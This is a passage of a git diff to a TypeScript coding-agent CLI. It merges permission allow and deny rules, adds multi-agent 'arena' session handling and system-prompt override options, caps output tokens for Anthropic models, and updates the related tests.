+ messageBus, + `Successfully authenticated with ${authMethod}`, + NotificationType.AuthSuccess, + 'Authentication successful', + ).catch(() => { + // Silently ignore errors - fireNotificationHook has internal error handling + // and notification hooks should not block the auth flow + }); + } } /** @@ -1166,6 +1319,10 @@ export class Config { return this.targetDir; } + getCwd(): string { + return this.targetDir; + } + getWorkspaceContext(): WorkspaceContext { return this.workspaceContext; } @@ -1190,6 +1347,8 @@ export class Config { if (this.toolRegistry) { await this.toolRegistry.stop(); } + + await this.cleanupArenaRuntime(); } catch (error) { // Log but don't throw - cleanup should be best-effort this.debugLogger.error('Error during Config shutdown:', error); @@ -1208,16 +1367,68 @@ export class Config { return this.question; } + getSystemPrompt(): string | undefined { + return this.systemPrompt; + } + + getAppendSystemPrompt(): string | undefined { + return this.appendSystemPrompt; + } + + /** @deprecated Use getPermissionsAllow() instead. */ getCoreTools(): string[] | undefined { return this.coreTools; } - getAllowedTools(): string[] | undefined { - return this.allowedTools; + /** + * Returns the merged allow-rules for PermissionManager. + * + * This merges all sources so that PermissionManager receives a single, + * authoritative list: + * - settings.permissions.allow (persistent rules from all scopes) + * - allowedTools param (SDK / argv auto-approve list) + * + * Note: coreTools is intentionally excluded here — it has whitelist semantics + * (only listed tools are registered), not auto-approve semantics. It is + * handled separately via PermissionManager.coreToolsAllowList. + * + * CLI callers (loadCliConfig) already pre-merge argv into permissionsAllow + * before constructing Config, so those fields will be empty for CLI usage. + * SDK callers construct Config directly and rely on allowedTools. + */ + getPermissionsAllow(): string[] { + const base = this.permissionsAllow ?? []; + const sdkAllow = [...(this.allowedTools ?? [])]; + if (sdkAllow.length === 0) return base.length > 0 ? base : []; + const merged = [...base]; + for (const t of sdkAllow) { + if (t && !merged.includes(t)) merged.push(t); + } + return merged; } - getExcludeTools(): string[] | undefined { - return this.excludeTools; + getPermissionsAsk(): string[] { + return this.permissionsAsk; + } + + /** + * Returns the merged deny-rules for PermissionManager. + * + * Merges: + * - settings.permissions.deny (persistent rules from all scopes) + * - excludeTools param (SDK / argv blocklist) + * + * CLI callers pre-merge argv.excludeTools into permissionsDeny. + */ + getPermissionsDeny(): string[] { + const base = this.permissionsDeny ?? []; + const sdkDeny = this.excludeTools ?? []; + if (sdkDeny.length === 0) return base.length > 0 ? base : []; + const merged = [...base]; + for (const t of sdkDeny) { + if (t && !merged.includes(t)) merged.push(t); + } + return merged; } getToolDiscoveryCommand(): string | undefined { @@ -1334,6 +1545,50 @@ export class Config { this.geminiMdFileCount = count; } + getArenaManager(): ArenaManager | null { + return this.arenaManager; + } + + setArenaManager(manager: ArenaManager | null): void { + this.arenaManager = manager; + this.arenaManagerChangeCallback?.(manager); + } + + /** + * Register a callback invoked whenever the arena manager changes. + * Pass `null` to unsubscribe. Only one subscriber is supported. + */ + onArenaManagerChange( + cb: ((manager: ArenaManager | null) => void) | null, + ): void { + this.arenaManagerChangeCallback = cb; + } + + getArenaAgentClient(): ArenaAgentClient | null { + return this.arenaAgentClient; + } + + getAgentsSettings(): AgentsCollabSettings { + return this.agentsSettings; + } + + /** + * Clean up Arena runtime. When `force` is true (e.g., /arena select --discard), + * always removes worktrees regardless of preserveArtifacts. + */ + async cleanupArenaRuntime(force?: boolean): Promise { + const manager = this.arenaManager; + if (!manager) { + return; + } + if (!force && this.agentsSettings.arena?.preserveArtifacts) { + await manager.cleanupRuntime(); + } else { + await manager.cleanup(); + } + this.setArenaManager(null); + } + getApprovalMode(): ApprovalMode { return this.approvalMode; } @@ -1599,12 +1854,6 @@ export class Config { return this.getNoBrowser() || !shouldAttemptBrowserLaunch(); } - getSummarizeToolOutputConfig(): - | Record - | undefined { - return this.summarizeToolOutput; - } - // Web search provider configuration getWebSearchConfig() { return this.webSearch; @@ -1665,7 +1914,7 @@ export class Config { * Get the default file encoding for new files. * @returns FileEncodingType */ - getDefaultFileEncoding(): FileEncodingType { + getDefaultFileEncoding(): FileEncodingType | undefined { return this.defaultFileEncoding; } @@ -1733,15 +1982,8 @@ export class Config { return this.skipStartupContext; } - getEnableToolOutputTruncation(): boolean { - return this.enableToolOutputTruncation; - } - getTruncateToolOutputThreshold(): number { - if ( - !this.enableToolOutputTruncation || - this.truncateToolOutputThreshold <= 0 - ) { + if (this.truncateToolOutputThreshold <= 0) { return Number.POSITIVE_INFINITY; } @@ -1749,7 +1991,7 @@ export class Config { } getTruncateToolOutputLines(): number { - if (!this.enableToolOutputTruncation || this.truncateToolOutputLines <= 0) { + if (this.truncateToolOutputLines <= 0) { return Number.POSITIVE_INFINITY; } @@ -1818,8 +2060,27 @@ export class Config { return this.skillManager; } + getPermissionManager(): PermissionManager | null { + return this.permissionManager; + } + + /** + * Returns the callback for persisting permission rules to settings files. + * Returns undefined if no callback was provided (e.g. SDK mode). + */ + getOnPersistPermissionRule(): + | (( + scope: 'project' | 'user', + ruleType: 'allow' | 'ask' | 'deny', + rule: string, + ) => Promise) + | undefined { + return this.onPersistPermissionRuleCallback; + } + async createToolRegistry( sendSdkMcpMessage?: SendSdkMcpMessage, + options?: { skipDiscovery?: boolean }, ): Promise { const registry = new ToolRegistry( this, @@ -1827,9 +2088,6 @@ export class Config { sendSdkMcpMessage, ); - const coreToolsConfig = this.getCoreTools(); - const excludeToolsConfig = this.getExcludeTools(); - // Helper to create & register core tools that are enabled // eslint-disable-next-line @typescript-eslint/no-explicit-any const registerCoreTool = (ToolClass: any, ...args: unknown[]) => { @@ -1845,7 +2103,13 @@ export class Config { return; } - if (isToolEnabled(toolName, coreToolsConfig, excludeToolsConfig)) { + // PermissionManager handles both the coreTools allowlist (registry-level) + // and deny rules (runtime-level) in a single check. + const pmEnabled = this.permissionManager + ? this.permissionManager.isToolEnabled(toolName) + : true; // Should never reach here after initialize(), but safe default. + + if (pmEnabled) { try { registry.registerTool(new ToolClass(...args)); } catch (error) { @@ -1909,7 +2173,9 @@ export class Config { registerCoreTool(LspTool, this); } - await registry.discoverAllTools(); + if (!options?.skipDiscovery) { + await registry.discoverAllTools(); + } this.debugLogger.debug( `ToolRegistry created: ${JSON.stringify(registry.getAllToolNames())} (${registry.getAllToolNames().length} tools)`, ); diff --git a/packages/core/src/config/storage.ts b/packages/core/src/config/storage.ts index 3293280a8..2697054a4 100644 --- a/packages/core/src/config/storage.ts +++ b/packages/core/src/config/storage.ts @@ -12,11 +12,13 @@ import { getProjectHash, sanitizeCwd } from '../utils/paths.js'; export const QWEN_DIR = '.qwen'; export const GOOGLE_ACCOUNTS_FILENAME = 'google_accounts.json'; export const OAUTH_FILE = 'oauth_creds.json'; +export const SKILL_PROVIDER_CONFIG_DIRS = ['.qwen', '.agent']; const TMP_DIR_NAME = 'tmp'; const BIN_DIR_NAME = 'bin'; const PROJECT_DIR_NAME = 'projects'; const IDE_DIR_NAME = 'ide'; const DEBUG_DIR_NAME = 'debug'; +const ARENA_DIR_NAME = 'arena'; export class Storage { private readonly targetDir: string; @@ -77,6 +79,10 @@ export class Storage { return path.join(Storage.getGlobalQwenDir(), BIN_DIR_NAME); } + static getGlobalArenaDir(): string { + return path.join(Storage.getGlobalQwenDir(), ARENA_DIR_NAME); + } + getQwenDir(): string { return path.join(this.targetDir, QWEN_DIR); } @@ -133,8 +139,20 @@ export class Storage { return path.join(this.getExtensionsDir(), 'qwen-extension.json'); } - getUserSkillsDir(): string { - return path.join(Storage.getGlobalQwenDir(), 'skills'); + getUserSkillsDirs(): string[] { + const homeDir = os.homedir() || os.tmpdir(); + return SKILL_PROVIDER_CONFIG_DIRS.map((dir) => + path.join(homeDir, dir, 'skills'), + ); + } + + /** + * Returns the user-level extensions directory (~/.qwen/extensions/). + * Extensions installed at user scope are stored here, as opposed to + * project-level extensions which live in /.qwen/extensions/. + */ + static getUserExtensionsDir(): string { + return path.join(Storage.getGlobalQwenDir(), 'extensions'); } getHistoryFilePath(): string { diff --git a/packages/core/src/core/anthropicContentGenerator/anthropicContentGenerator.test.ts b/packages/core/src/core/anthropicContentGenerator/anthropicContentGenerator.test.ts index 3f0e17197..16cf3622f 100644 --- a/packages/core/src/core/anthropicContentGenerator/anthropicContentGenerator.test.ts +++ b/packages/core/src/core/anthropicContentGenerator/anthropicContentGenerator.test.ts @@ -328,6 +328,170 @@ describe('AnthropicContentGenerator', () => { expect.not.objectContaining({ thinking: expect.anything() }), ); }); + + describe('output token limits', () => { + it('caps configured samplingParams.max_tokens to model output limit', async () => { + const { AnthropicContentGenerator } = await importGenerator(); + anthropicState.createImpl.mockResolvedValue({ + id: 'anthropic-1', + model: 'claude-sonnet-4', + content: [{ type: 'text', text: 'hi' }], + }); + + const generator = new AnthropicContentGenerator( + { + model: 'claude-sonnet-4', + apiKey: 'test-key', + timeout: 10_000, + maxRetries: 2, + samplingParams: { max_tokens: 200_000 }, + schemaCompliance: 'auto', + }, + mockConfig, + ); + + await generator.generateContent({ + model: 'models/ignored', + contents: 'Hello', + } as unknown as GenerateContentParameters); + + const [anthropicRequest] = + anthropicState.lastCreateArgs as AnthropicCreateArgs; + expect(anthropicRequest).toEqual( + expect.objectContaining({ max_tokens: 65536 }), + ); + }); + + it('caps request.config.maxOutputTokens to model output limit when config max_tokens is missing', async () => { + const { AnthropicContentGenerator } = await importGenerator(); + anthropicState.createImpl.mockResolvedValue({ + id: 'anthropic-1', + model: 'claude-sonnet-4', + content: [{ type: 'text', text: 'hi' }], + }); + + const generator = new AnthropicContentGenerator( + { + model: 'claude-sonnet-4', + apiKey: 'test-key', + timeout: 10_000, + maxRetries: 2, + samplingParams: {}, + schemaCompliance: 'auto', + }, + mockConfig, + ); + + await generator.generateContent({ + model: 'models/ignored', + contents: 'Hello', + config: { maxOutputTokens: 100_000 }, + } as unknown as GenerateContentParameters); + + const [anthropicRequest] = + anthropicState.lastCreateArgs as AnthropicCreateArgs; + expect(anthropicRequest).toEqual( + expect.objectContaining({ max_tokens: 65536 }), + ); + }); + + it('uses conservative default when max_tokens is not explicitly configured', async () => { + const { AnthropicContentGenerator } = await importGenerator(); + anthropicState.createImpl.mockResolvedValue({ + id: 'anthropic-1', + model: 'claude-sonnet-4', + content: [{ type: 'text', text: 'hi' }], + }); + + const generator = new AnthropicContentGenerator( + { + model: 'claude-sonnet-4', + apiKey: 'test-key', + timeout: 10_000, + maxRetries: 2, + samplingParams: {}, + schemaCompliance: 'auto', + }, + mockConfig, + ); + + await generator.generateContent({ + model: 'models/ignored', + contents: 'Hello', + } as unknown as GenerateContentParameters); + + const [anthropicRequest] = + anthropicState.lastCreateArgs as AnthropicCreateArgs; + expect(anthropicRequest).toEqual( + expect.objectContaining({ max_tokens: 32000 }), + ); + }); + + it('respects configured max_tokens for unknown models', async () => { + const { AnthropicContentGenerator } = await importGenerator(); + anthropicState.createImpl.mockResolvedValue({ + id: 'anthropic-1', + model: 'unknown-model', + content: [{ type: 'text', text: 'hi' }], + }); + + const generator = new AnthropicContentGenerator( + { + model: 'unknown-model', + apiKey: 'test-key', + timeout: 10_000, + maxRetries: 2, + samplingParams: { max_tokens: 100_000 }, + schemaCompliance: 'auto', + }, + mockConfig, + ); + + await generator.generateContent({ + model: 'models/ignored', + contents: 'Hello', + } as unknown as GenerateContentParameters); + + const [anthropicRequest] = + anthropicState.lastCreateArgs as AnthropicCreateArgs; + expect(anthropicRequest).toEqual( + expect.objectContaining({ max_tokens: 100_000 }), + ); + }); + + it('treats null maxOutputTokens as not configured', async () => { + const { AnthropicContentGenerator } = await importGenerator(); + anthropicState.createImpl.mockResolvedValue({ + id: 'anthropic-1', + model: 'claude-sonnet-4', + content: [{ type: 'text', text: 'hi' }], + }); + + const generator = new AnthropicContentGenerator( + { + model: 'claude-sonnet-4', + apiKey: 'test-key', + timeout: 10_000, + maxRetries: 2, + samplingParams: {}, + schemaCompliance: 'auto', + }, + mockConfig, + ); + + await generator.generateContent({ + model: 'models/ignored', + contents: 'Hello', + config: { maxOutputTokens: null as unknown as undefined }, + } as unknown as GenerateContentParameters); + + const [anthropicRequest] = + anthropicState.lastCreateArgs as AnthropicCreateArgs; + expect(anthropicRequest).toEqual( + expect.objectContaining({ max_tokens: 32000 }), + ); + }); + }); }); describe('countTokens', () => { diff --git a/packages/core/src/core/anthropicContentGenerator/anthropicContentGenerator.ts b/packages/core/src/core/anthropicContentGenerator/anthropicContentGenerator.ts index 3fcd4b96d..e3c61893e 100644 --- a/packages/core/src/core/anthropicContentGenerator/anthropicContentGenerator.ts +++ b/packages/core/src/core/anthropicContentGenerator/anthropicContentGenerator.ts @@ -31,6 +31,11 @@ import { AnthropicContentConverter } from './converter.js'; import { buildRuntimeFetchOptions } from '../../utils/runtimeFetchOptions.js'; import { DEFAULT_TIMEOUT } from '../openaiContentGenerator/constants.js'; import { createDebugLogger } from '../../utils/debugLogger.js'; +import { + tokenLimit, + DEFAULT_OUTPUT_TOKEN_LIMIT, + hasExplicitOutputLimit, +} from '../tokenLimits.js'; const debugLogger = createDebugLogger('ANTHROPIC'); @@ -223,8 +228,18 @@ export class AnthropicContentGenerator implements ContentGenerator { return configValue !== undefined ? configValue : requestValue; }; + // Apply output token limit logic consistent with OpenAI providers + const userMaxTokens = getParam('max_tokens', 'maxOutputTokens'); + const modelId = this.contentGeneratorConfig.model; + const modelLimit = tokenLimit(modelId, 'output'); + const isKnownModel = hasExplicitOutputLimit(modelId); + const maxTokens = - getParam('max_tokens', 'maxOutputTokens') ?? 10_000; + userMaxTokens !== undefined && userMaxTokens !== null + ? isKnownModel + ? Math.min(userMaxTokens, modelLimit) + : userMaxTokens + : Math.min(modelLimit, DEFAULT_OUTPUT_TOKEN_LIMIT); return { max_tokens: maxTokens, diff --git a/packages/core/src/core/client.test.ts b/packages/core/src/core/client.test.ts index f374a1d44..d9bdfe7a7 100644 --- a/packages/core/src/core/client.test.ts +++ b/packages/core/src/core/client.test.ts @@ -15,7 +15,7 @@ import { } from 'vitest'; import type { Content, GenerateContentResponse, Part } from '@google/genai'; -import { GeminiClient } from './client.js'; +import { GeminiClient, SendMessageType } from './client.js'; import { findCompressSplitPoint } from '../services/chatCompressionService.js'; import { AuthType, @@ -31,7 +31,7 @@ import { Turn, type ChatCompressionInfo, } from './turn.js'; -import { getCoreSystemPrompt } from './prompts.js'; +import { getCoreSystemPrompt, getCustomSystemPrompt } from './prompts.js'; import { DEFAULT_QWEN_FLASH_MODEL } from '../config/models.js'; import { FileDiscoveryService } from '../services/fileDiscoveryService.js'; import { promptIdContext } from '../utils/promptIdContext.js'; @@ -315,6 +315,8 @@ describe('Gemini Client (client.ts)', () => { getVertexAI: vi.fn().mockReturnValue(false), getUserAgent: vi.fn().mockReturnValue('test-agent'), getUserMemory: vi.fn().mockReturnValue(''), + getSystemPrompt: vi.fn().mockReturnValue(undefined), + getAppendSystemPrompt: vi.fn().mockReturnValue(undefined), getFullContext: vi.fn().mockReturnValue(false), getSessionId: vi.fn().mockReturnValue('test-session-id'), getProxy: vi.fn().mockReturnValue(undefined), @@ -357,8 +359,17 @@ describe('Gemini Client (client.ts)', () => { getSkipLoopDetection: vi.fn().mockReturnValue(false), getChatRecordingService: vi.fn().mockReturnValue(undefined), getResumedSessionData: vi.fn().mockReturnValue(undefined), + getArenaAgentClient: vi.fn().mockReturnValue(null), getEnableHooks: vi.fn().mockReturnValue(false), + getArenaManager: vi.fn().mockReturnValue(null), getMessageBus: vi.fn().mockReturnValue(undefined), + getHookSystem: vi.fn().mockReturnValue(undefined), + getDebugLogger: vi.fn().mockReturnValue({ + debug: vi.fn(), + info: vi.fn(), + warn: vi.fn(), + error: vi.fn(), + }), } as unknown as Config; client = new GeminiClient(mockConfig); @@ -1552,7 +1563,7 @@ Other open files: [{ text: 'Start conversation' }], signal, 'prompt-id-3', - { isContinuation: false }, + { type: SendMessageType.UserQuery }, Number.MAX_SAFE_INTEGER, // Bypass the MAX_TURNS protection ); @@ -2305,6 +2316,70 @@ Other open files: // Assert - loop detection methods should not be called when skipLoopDetection is true expect(ldMock.addAndCheck).not.toHaveBeenCalled(); }); + + describe('retry sendMessageType', () => { + it('should call stripOrphanedUserEntriesFromHistory before executing', async () => { + const mockChat: Partial = { + addHistory: vi.fn(), + getHistory: vi.fn().mockReturnValue([]), + setHistory: vi.fn(), + stripThoughtsFromHistory: vi.fn(), + stripOrphanedUserEntriesFromHistory: vi.fn(), + }; + client['chat'] = mockChat as GeminiChat; + + const mockStream = (async function* () { + yield { type: 'content', value: 'retry response' }; + })(); + mockTurnRunFn.mockReturnValue(mockStream); + + // Act: send with retry type + const stream = client.sendMessageStream( + [{ text: 'second message' }], + new AbortController().signal, + 'prompt-retry', + { type: SendMessageType.Retry }, + ); + for await (const _ of stream) { + /* consume */ + } + + // Assert: the cleanup method was called + expect( + mockChat.stripOrphanedUserEntriesFromHistory, + ).toHaveBeenCalledOnce(); + }); + + it('should not increment sessionTurnCount for retry', async () => { + const mockChat: Partial = { + addHistory: vi.fn(), + getHistory: vi.fn().mockReturnValue([]), + setHistory: vi.fn(), + stripThoughtsFromHistory: vi.fn(), + stripOrphanedUserEntriesFromHistory: vi.fn(), + }; + client['chat'] = mockChat as GeminiChat; + + const mockStream = (async function* () { + yield { type: 'content', value: 'ok' }; + })(); + mockTurnRunFn.mockReturnValue(mockStream); + + const turnCountBefore = client['sessionTurnCount']; + + const stream = client.sendMessageStream( + [{ text: 'retry' }], + new AbortController().signal, + 'prompt-retry-3', + { type: SendMessageType.Retry }, + ); + for await (const _ of stream) { + /* consume */ + } + + expect(client['sessionTurnCount']).toBe(turnCountBefore); + }); + }); }); describe('generateContent', () => { @@ -2412,6 +2487,104 @@ Other open files: ); }); + it('should use config system prompt override when provided', async () => { + const contents = [{ role: 'user', parts: [{ text: 'hello' }] }]; + const abortSignal = new AbortController().signal; + + vi.spyOn(client['config'], 'getSystemPrompt').mockReturnValue( + 'Override prompt', + ); + vi.spyOn(client['config'], 'getUserMemory').mockReturnValue( + 'Saved memory', + ); + vi.mocked(getCustomSystemPrompt).mockReturnValueOnce( + 'Override prompt with memory', + ); + + await client.generateContent( + contents, + {}, + abortSignal, + DEFAULT_QWEN_FLASH_MODEL, + ); + + expect(getCustomSystemPrompt).toHaveBeenCalledWith( + 'Override prompt', + 'Saved memory', + undefined, + ); + expect(mockContentGenerator.generateContent).toHaveBeenCalledWith( + expect.objectContaining({ + config: expect.objectContaining({ + systemInstruction: 'Override prompt with memory', + }), + }), + 'test-session-id', + ); + }); + + it('should append config appendSystemPrompt to the core system prompt', async () => { + const contents = [{ role: 'user', parts: [{ text: 'hello' }] }]; + const abortSignal = new AbortController().signal; + + vi.mocked(getCoreSystemPrompt).mockClear(); + vi.spyOn(client['config'], 'getAppendSystemPrompt').mockReturnValue( + 'Be extra concise.', + ); + + await client.generateContent( + contents, + {}, + abortSignal, + DEFAULT_QWEN_FLASH_MODEL, + ); + + expect(getCoreSystemPrompt).toHaveBeenCalledWith( + '', + 'test-model', + 'Be extra concise.', + ); + }); + + it('should append config appendSystemPrompt after a config system prompt override', async () => { + const contents = [{ role: 'user', parts: [{ text: 'hello' }] }]; + const abortSignal = new AbortController().signal; + + vi.spyOn(client['config'], 'getSystemPrompt').mockReturnValue( + 'Override prompt', + ); + vi.spyOn(client['config'], 'getAppendSystemPrompt').mockReturnValue( + 'Focus on findings only.', + ); + vi.spyOn(client['config'], 'getUserMemory').mockReturnValue( + 'Saved memory', + ); + vi.mocked(getCustomSystemPrompt).mockReturnValueOnce( + 'Override prompt with memory and append', + ); + + await client.generateContent( + contents, + {}, + abortSignal, + DEFAULT_QWEN_FLASH_MODEL, + ); + + expect(getCustomSystemPrompt).toHaveBeenCalledWith( + 'Override prompt', + 'Saved memory', + 'Focus on findings only.', + ); + expect(mockContentGenerator.generateContent).toHaveBeenCalledWith( + expect.objectContaining({ + config: expect.objectContaining({ + systemInstruction: 'Override prompt with memory and append', + }), + }), + 'test-session-id', + ); + }); + // Note: there is currently no "fallback mode" model routing; the model used // is always the one explicitly requested by the caller. }); diff --git a/packages/core/src/core/client.ts b/packages/core/src/core/client.ts index 64822453a..4550b43ac 100644 --- a/packages/core/src/core/client.ts +++ b/packages/core/src/core/client.ts @@ -23,6 +23,7 @@ const debugLogger = createDebugLogger('CLIENT'); import type { ContentGenerator } from './contentGenerator.js'; import { GeminiChat } from './geminiChat.js'; import { + getArenaSystemReminder, getCoreSystemPrompt, getCustomSystemPrompt, getPlanModeSystemReminder, @@ -86,6 +87,17 @@ import type { StopHookOutput } from '../hooks/types.js'; const MAX_TURNS = 100; +export enum SendMessageType { + UserQuery = 'userQuery', + ToolResult = 'toolResult', + Retry = 'retry', + Hook = 'hook', +} + +export interface SendMessageOptions { + type: SendMessageType; +} + export class GeminiClient { private chat?: GeminiChat; private sessionTurnCount = 0; @@ -153,6 +165,10 @@ export class GeminiClient { this.getChat().stripThoughtsFromHistory(); } + private stripOrphanedUserEntriesFromHistory() { + this.getChat().stripOrphanedUserEntriesFromHistory(); + } + setHistory(history: Content[]) { this.getChat().setHistory(history); this.forceFullIdeContext = true; @@ -184,6 +200,26 @@ export class GeminiClient { }); } + private getMainSessionSystemInstruction(): string { + const userMemory = this.config.getUserMemory(); + const overrideSystemPrompt = this.config.getSystemPrompt(); + const appendSystemPrompt = this.config.getAppendSystemPrompt(); + + if (overrideSystemPrompt) { + return getCustomSystemPrompt( + overrideSystemPrompt, + userMemory, + appendSystemPrompt, + ); + } + + return getCoreSystemPrompt( + userMemory, + this.config.getModel(), + appendSystemPrompt, + ); + } + async startChat(extraHistory?: Content[]): Promise { this.forceFullIdeContext = true; this.hasFailedCompressionAttempt = false; @@ -195,9 +231,7 @@ export class GeminiClient { const history = await getInitialChatHistory(this.config, extraHistory); try { - const userMemory = this.config.getUserMemory(); - const model = this.config.getModel(); - const systemInstruction = getCoreSystemPrompt(userMemory, model); + const systemInstruction = this.getMainSessionSystemInstruction(); return new GeminiChat( this.config, @@ -207,6 +241,7 @@ export class GeminiClient { }, history, this.config.getChatRecordingService(), + uiTelemetryService, ); } catch (error) { await reportError( @@ -415,13 +450,19 @@ export class GeminiClient { request: PartListUnion, signal: AbortSignal, prompt_id: string, - options?: { isContinuation: boolean }, + options?: SendMessageOptions, turns: number = MAX_TURNS, ): AsyncGenerator { + const messageType = options?.type ?? SendMessageType.UserQuery; + + if (messageType === SendMessageType.Retry) { + this.stripOrphanedUserEntriesFromHistory(); + } + // Fire UserPromptSubmit hook through MessageBus (only if hooks are enabled) const hooksEnabled = this.config.getEnableHooks(); const messageBus = this.config.getMessageBus(); - if (hooksEnabled && messageBus) { + if (messageType !== SendMessageType.Retry && hooksEnabled && messageBus) { const promptText = partToString(request); const response = await messageBus.request< HookExecutionRequest, @@ -463,7 +504,7 @@ export class GeminiClient { } } - if (!options?.isContinuation) { + if (messageType === SendMessageType.UserQuery) { this.loopDetector.reset(prompt_id); this.lastPromptId = prompt_id; @@ -473,14 +514,18 @@ export class GeminiClient { // strip thoughts from history before sending the message this.stripThoughtsFromHistory(); } - this.sessionTurnCount++; - if ( - this.config.getMaxSessionTurns() > 0 && - this.sessionTurnCount > this.config.getMaxSessionTurns() - ) { - yield { type: GeminiEventType.MaxSessionTurns }; - return new Turn(this.getChat(), prompt_id); + if (messageType !== SendMessageType.Retry) { + this.sessionTurnCount++; + + if ( + this.config.getMaxSessionTurns() > 0 && + this.sessionTurnCount > this.config.getMaxSessionTurns() + ) { + yield { type: GeminiEventType.MaxSessionTurns }; + return new Turn(this.getChat(), prompt_id); + } } + // Ensure turns never exceeds MAX_TURNS to prevent infinite loops const boundedTurns = Math.min(turns, MAX_TURNS); if (!boundedTurns) { @@ -540,11 +585,24 @@ export class GeminiClient { this.forceFullIdeContext = false; } + // Check for arena control signal before starting a new turn + const arenaAgentClient = this.config.getArenaAgentClient(); + if (arenaAgentClient) { + const controlSignal = await arenaAgentClient.checkControlSignal(); + if (controlSignal) { + debugLogger.info( + `Arena control signal received: ${controlSignal.type} - ${controlSignal.reason}`, + ); + await arenaAgentClient.reportCancelled(); + return new Turn(this.getChat(), prompt_id); + } + } + const turn = new Turn(this.getChat(), prompt_id); // append system reminders to the request let requestToSent = await flatMapTextParts(request, async (text) => [text]); - if (!options?.isContinuation) { + if (messageType === SendMessageType.UserQuery) { const systemReminders = []; // add subagent system reminder if there are subagents @@ -564,6 +622,18 @@ export class GeminiClient { ); } + // add arena system reminder if an arena session is active + const arenaManager = this.config.getArenaManager(); + if (arenaManager) { + try { + const sessionDir = arenaManager.getArenaSessionDir(); + const configPath = `${sessionDir}/config.json`; + systemReminders.push(getArenaSystemReminder(configPath)); + } catch { + // Arena config not yet initialized — skip + } + } + requestToSent = [...systemReminders, ...requestToSent]; } @@ -576,11 +646,27 @@ export class GeminiClient { if (!this.config.getSkipLoopDetection()) { if (this.loopDetector.addAndCheck(event)) { yield { type: GeminiEventType.LoopDetected }; + if (arenaAgentClient) { + await arenaAgentClient.reportError('Loop detected'); + } return turn; } } + // Update arena status on Finished events — stats are derived + // automatically from uiTelemetryService by the reporter. + if (arenaAgentClient && event.type === GeminiEventType.Finished) { + await arenaAgentClient.updateStatus(); + } + yield event; if (event.type === GeminiEventType.Error) { + if (arenaAgentClient) { + const errorMsg = + event.value instanceof Error + ? event.value.message + : 'Unknown error'; + await arenaAgentClient.reportError(errorMsg); + } return turn; } } @@ -637,7 +723,7 @@ export class GeminiClient { continueRequest, signal, prompt_id, - { isContinuation: true }, + { type: SendMessageType.Hook }, boundedTurns - 1, ); } @@ -645,6 +731,10 @@ export class GeminiClient { if (!turn.pendingToolCalls.length && signal && !signal.aborted) { if (this.config.getSkipNextSpeakerCheck()) { + // Report completed before returning — agent has no more work to do + if (arenaAgentClient) { + await arenaAgentClient.reportCompleted(); + } return turn; } @@ -673,9 +763,17 @@ export class GeminiClient { options, boundedTurns - 1, ); + } else if (arenaAgentClient) { + // No continuation needed — agent completed its task + await arenaAgentClient.reportCompleted(); } } + // Report cancelled to arena when user cancelled mid-stream + if (signal?.aborted && arenaAgentClient) { + await arenaAgentClient.reportCancelled(); + } + return turn; } @@ -694,7 +792,7 @@ export class GeminiClient { const userMemory = this.config.getUserMemory(); const finalSystemInstruction = generationConfig.systemInstruction ? getCustomSystemPrompt(generationConfig.systemInstruction, userMemory) - : getCoreSystemPrompt(userMemory, this.config.getModel()); + : this.getMainSessionSystemInstruction(); const requestConfig: GenerateContentConfig = { abortSignal, diff --git a/packages/core/src/core/coreToolScheduler.test.ts b/packages/core/src/core/coreToolScheduler.test.ts index 145e8ace1..65c614616 100644 --- a/packages/core/src/core/coreToolScheduler.test.ts +++ b/packages/core/src/core/coreToolScheduler.test.ts @@ -15,6 +15,7 @@ import type { ToolResultDisplay, ToolRegistry, } from '../index.js'; +import type { PermissionDecision } from '../permissions/types.js'; import { ApprovalMode, BaseDeclarativeTool, @@ -29,16 +30,18 @@ import type { ToolCall, WaitingToolCall } from './coreToolScheduler.js'; import { CoreToolScheduler, convertToFunctionResponse, - truncateAndSaveToFile, } from './coreToolScheduler.js'; import type { Part, PartListUnion } from '@google/genai'; import { MockModifiableTool, MockTool, - MOCK_TOOL_SHOULD_CONFIRM_EXECUTE, + MOCK_TOOL_GET_DEFAULT_PERMISSION, + MOCK_TOOL_GET_CONFIRMATION_DETAILS, } from '../test-utils/mock-tool.js'; -import * as fs from 'node:fs/promises'; -import * as path from 'node:path'; +import { MessageBusType } from '../confirmation-bus/types.js'; +import type { HookExecutionResponse } from '../confirmation-bus/types.js'; +import { type NotificationType } from '../hooks/types.js'; +import type { MessageBus } from '../confirmation-bus/message-bus.js'; vi.mock('fs/promises', () => ({ writeFile: vi.fn(), @@ -83,14 +86,14 @@ class TestApprovalInvocation extends BaseToolInvocation< return `Test tool ${this.params.id}`; } - override async shouldConfirmExecute(): Promise< - ToolCallConfirmationDetails | false - > { - // Need confirmation unless approval mode is AUTO_EDIT + override async getDefaultPermission(): Promise { if (this.config.getApprovalMode() === ApprovalMode.AUTO_EDIT) { - return false; + return 'allow'; } + return 'ask'; + } + override async getConfirmationDetails(): Promise { return { type: 'edit', title: `Confirm Test Tool ${this.params.id}`, @@ -127,9 +130,13 @@ class AbortDuringConfirmationInvocation extends BaseToolInvocation< super(params); } - override async shouldConfirmExecute( + override async getDefaultPermission(): Promise { + return 'ask'; + } + + override async getConfirmationDetails( _signal: AbortSignal, - ): Promise { + ): Promise { this.abortController.abort(); throw this.abortError; } @@ -213,7 +220,8 @@ describe('CoreToolScheduler', () => { it('should cancel a tool call if the signal is aborted before confirmation', async () => { const mockTool = new MockTool({ name: 'mockTool', - shouldConfirmExecute: MOCK_TOOL_SHOULD_CONFIRM_EXECUTE, + getDefaultPermission: MOCK_TOOL_GET_DEFAULT_PERMISSION, + getConfirmationDetails: MOCK_TOOL_GET_CONFIRMATION_DETAILS, }); const declarativeTool = mockTool; const mockToolRegistry = { @@ -238,7 +246,7 @@ describe('CoreToolScheduler', () => { getUsageStatisticsEnabled: () => true, getDebugMode: () => false, getApprovalMode: () => ApprovalMode.DEFAULT, - getAllowedTools: () => [], + getPermissionsAllow: () => [], getContentGeneratorConfig: () => ({ model: 'test-model', authType: 'gemini', @@ -257,6 +265,8 @@ describe('CoreToolScheduler', () => { getUseModelRouter: () => false, getGeminiClient: () => null, // No client needed for these tests getChatRecordingService: () => undefined, + getMessageBus: vi.fn().mockReturnValue(undefined), + getEnableHooks: vi.fn().mockReturnValue(false), } as unknown as Config; const scheduler = new CoreToolScheduler({ @@ -315,7 +325,7 @@ describe('CoreToolScheduler', () => { getUsageStatisticsEnabled: () => true, getDebugMode: () => false, getApprovalMode: () => ApprovalMode.DEFAULT, - getAllowedTools: () => [], + getPermissionsAllow: () => [], getContentGeneratorConfig: () => ({ model: 'test-model', authType: 'gemini', @@ -334,6 +344,8 @@ describe('CoreToolScheduler', () => { 